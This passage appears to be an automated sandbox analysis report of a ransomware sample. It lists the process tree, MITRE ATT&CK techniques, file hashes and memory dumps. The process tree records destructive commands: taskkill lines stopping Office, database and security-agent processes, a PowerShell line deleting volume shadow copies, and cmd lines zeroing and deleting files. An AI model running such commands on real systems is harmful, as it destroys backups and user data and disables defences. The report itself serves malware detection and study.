C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3816

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4680

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2788

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3948

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3712

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4152

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3624

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3192

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4204

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3800

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:616

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4456

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4292

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4468

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2784

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5040

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3544

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:4528

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:616

C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:3336

C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:5816

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
2⤵
PID:4204

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:4748

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2a84a6a6c326f285e6e21096b12bd969

SHA1
9be8d1dc219dc1cfda315acf8680af06173cf696

SHA256
f67d9a6332817ae22e0000b3a6ac0b4b5369802bfb935a3e8cdb75668bcd9776

SHA512
a2503237b630c1df259791c7060942c14698274772ffd3d89ba92e96fca3daa25e27fae8fcb53766cfd6e5fb2adbc83a9cf62ceb722bb505e603c54eb3f66931

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
MD5
1be2f1bf18c999a73d0e09f1f05caf69

SHA1
b6ce5de5c5f12d43ab2378fc291b097a82b65d9f

SHA256
b3afeebc76faaeeb1fd7694c1cd40e41e71bae5173049d26f6439b3721080621

SHA512
ff38872c3d32fb9590d13678e771d6babeb37a670957d658c4450252b7767f89db291c7d1d4f271367d3e70367b5010a1346f02b89d83f86cf60b4245a45cd87

Download Submit
memory/200-33-0x0000000000000000-mapping.dmp

Download
memory/420-8-0x0000000000000000-mapping.dmp

Download
memory/616-62-0x0000000000000000-mapping.dmp

Download
memory/616-47-0x0000000000000000-mapping.dmp

Download
memory/652-17-0x0000000000000000-mapping.dmp

Download
memory/724-10-0x0000000000000000-mapping.dmp

Download
memory/972-5-0x0000000000000000-mapping.dmp

Download
memory/980-18-0x0000000000000000-mapping.dmp

Download
memory/988-6-0x0000000000000000-mapping.dmp

Download
memory/1092-22-0x0000000000000000-mapping.dmp

Download
memory/1104-19-0x0000000000000000-mapping.dmp

Download
memory/1392-36-0x0000000000000000-mapping.dmp

Download
memory/1608-20-0x0000000000000000-mapping.dmp

Download
memory/1676-49-0x0000000000000000-mapping.dmp

Download
memory/1804-21-0x0000000000000000-mapping.dmp

Download
memory/2004-27-0x0000000000000000-mapping.dmp

Download
memory/2040-38-0x0000000000000000-mapping.dmp

Download
memory/2268-23-0x0000000000000000-mapping.dmp

Download
memory/2456-24-0x0000000000000000-mapping.dmp

Download
memory/2784-52-0x0000000000000000-mapping.dmp

Download
memory/2788-37-0x0000000000000000-mapping.dmp

Download
memory/2792-9-0x0000000000000000-mapping.dmp

Download
memory/2960-25-0x0000000000000000-mapping.dmp

Download
memory/3008-4-0x0000000000000000-mapping.dmp

Download
memory/3192-44-0x0000000000000000-mapping.dmp

Download
memory/3220-12-0x0000000000000000-mapping.dmp

Download
memory/3336-65-0x0000000000000000-mapping.dmp

Download
memory/3544-56-0x00007FF9427B0000-0x00007FF94319C000-memory.dmp

Filesize
9.9MB

Download
memory/3544-55-0x0000000000000000-mapping.dmp

Download
memory/3544-57-0x000002B679AD0000-0x000002B679AD1000-memory.dmp

Filesize
4KB

Download
memory/3544-58-0x000002B679C80000-0x000002B679C81000-memory.dmp

Filesize
4KB

Download
memory/3544-7-0x0000000000000000-mapping.dmp

Download
memory/3624-43-0x0000000000000000-mapping.dmp

Download
memory/3644-30-0x0000000000000000-mapping.dmp

Download
memory/3712-41-0x0000000000000000-mapping.dmp

Download
memory/3800-46-0x0000000000000000-mapping.dmp

Download
memory/3816-34-0x0000000000000000-mapping.dmp

Download
memory/3860-13-0x0000000000000000-mapping.dmp

Download
memory/3948-39-0x0000000000000000-mapping.dmp

Download
memory/4152-42-0x0000000000000000-mapping.dmp

Download
memory/4196-15-0x0000000000000000-mapping.dmp

Download
memory/4200-14-0x0000000000000000-mapping.dmp

Download
memory/4204-45-0x0000000000000000-mapping.dmp

Download
memory/4204-63-0x0000000000000000-mapping.dmp

Download
memory/4220-54-0x0000000000000000-mapping.dmp

Download
memory/4292-50-0x0000000000000000-mapping.dmp

Download
memory/4308-11-0x0000000000000000-mapping.dmp

Download
memory/4348-16-0x0000000000000000-mapping.dmp

Download
memory/4456-48-0x0000000000000000-mapping.dmp

Download
memory/4460-26-0x0000000000000000-mapping.dmp

Download
memory/4468-51-0x0000000000000000-mapping.dmp

Download
memory/4528-61-0x0000000000000000-mapping.dmp

Download
memory/4552-28-0x0000000000000000-mapping.dmp

Download
memory/4624-29-0x0000000000000000-mapping.dmp

Download
memory/4680-35-0x0000000000000000-mapping.dmp

Download
memory/4736-32-0x0000000000000000-mapping.dmp

Download
memory/4748-66-0x0000000000000000-mapping.dmp

Download
memory/4752-31-0x0000000000000000-mapping.dmp

Download
memory/4764-0-0x00007FF9427B0000-0x00007FF94319C000-memory.dmp

Filesize
9.9MB

Download
memory/4764-1-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/5040-53-0x0000000000000000-mapping.dmp

Download
memory/5104-3-0x0000000000000000-mapping.dmp

Download
memory/5112-40-0x0000000000000000-mapping.dmp

Download
memory/5816-67-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads